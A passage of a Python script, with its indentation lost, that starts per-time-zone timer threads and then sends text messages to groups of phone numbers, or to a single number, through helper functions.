for i in tz_list:
if i == "Etc/Unknown":
continue
pnd.append(phoneNumberData[phoneNumberData.tz == i])
th_list.append(Thread(target = main.timer, args = (i,t)))
for i in range(len(th_list)):
th_list[i].start()
print(pnd)
tfl = [None] * len(th_list)
x = 0
while True:
if x == len(th_list):
x = 0
if len(th_list) == 0:
break
tfl[x] = (th_list[x].is_alive())
print(tfl)
if False in tfl:
main.sendMultipleMessage(pnd[x],message)
th_list.pop(x)
tfl.pop(x)
pnd.pop(x)
x = x +1
elif a == False:
main.sendMultipleMessage(phoneNumberData,message)
break
elif a == "2":
message = check.messageCheck()
phoneNumber = check.phoneNumberCheck()
main.sendMessage(str(phoneNumber),message)
break
print("Message sent.")
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.